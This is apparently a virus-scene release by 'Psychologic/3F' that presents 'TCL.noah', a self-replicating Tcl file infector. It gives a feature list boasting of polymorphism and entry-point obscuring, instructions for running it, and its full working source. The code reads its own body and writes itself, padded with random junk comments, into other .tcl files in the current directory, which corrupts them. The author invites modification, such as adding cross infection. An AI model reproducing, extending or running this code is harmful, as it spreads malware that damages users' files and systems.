NOAH/Psychologic

TCL (Tool Command Language) is a dynamic programming/scripting language based on concepts of Lisp, C, and Unix shells.
It can be used interactively, or by running scripts (programs) which can use a package system for structuring, 
hence allowing to do much with little code. Tcl is available for Linux, Windows, Mac OS X, as well as other platforms, 
as open-source software under BSD-like license, or as pre-built binaries.

Noah was writen as proof of concept TCL virus, I only need few hours to learn about its languange structure and
to code this virus. I've heard Gigabyte has did it first, but I never see her code, so i can admit this is the 
first one,and if not let say this is the first one polymorphism entry point obscuring tcl virus.

And here some descripiton about NOAH :

- Direct action Multi platform portable TCL virus 
- Parasiting host with simple EPO and polymorphism technique
- Work in many os Win/unix/BSD/linux/mac/iOS Cisco with tcl enterpeter
- Also work in mobile and network device such as router and switch under cisco product with IOS version 12.3(2)T or latter
- Infect current directory only to make it multiplatform
- Simple Polymorphism virus by trashing and carrying latest host entrypoint as virus part (harmfull)
- EPO tcl virus (virus can be anywhere at infected host, at random place)
- No payload
- No encryption
- No cross infection (you can modify this easly)

To run this thing

download and install any tcl interpreter (I'm using activestate)
run :

tclsh noah.tcl

Thats all, I did optimizing to the code, easy to understand
and you can modify noah code WITHOUT any guarantee.

Psychologic/3F

------------------------------------------------------------------------------------------------------------ Code cut

# TCL.noah By psychologic/3f
# Writen as proof of concept

puts "TCL.noah By Psychologic/3F"
set noah [open $argv0]
set vir [read $noah]
close $noah
set files {}
proc randstr {length {chars "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-!@#$%^&*()_+`1234567890-="}} {
    set range [expr {[string length $chars]-1}]

    set txt ""
    for {set i 0} {$i < $length} {incr i} {
       set pos [expr {int(rand()*$range)}]
       append txt [string range $chars $pos $pos]
    }
    return $txt
 }

   switch $::tcl_platform(platform) {
      windows {
         set ext .tcl
      }
      unix {
         set ext .tcl
      }
      java {
         set ext .tcl
      }
      macintosh {
         set ext .tcl
      }
   }
   foreach file [glob -nocomplain -directory "" *.*] {
      set objectFile [file tail [file rootname $file]]$ext
      if {[file exists $objectFile]} {
	
		
	set s [open $file r]
	set victim [read $s]
	close $s
	if {[string match "*noah*" $victim]} {continue}

	set p [expr {int(rand()*30)}]
	set po [randstr $p]
	set poly "#$po"
	set f [open $file w+]

	set e [expr {int(rand()*2)}]
	if {$e == 1} { 
	puts $f "$victim \n $poly \n $vir \n $poly" 
	continue }
	puts $f "$poly \n $vir \n $poly \n $victim \n $poly \n"
      }
   }
   return $files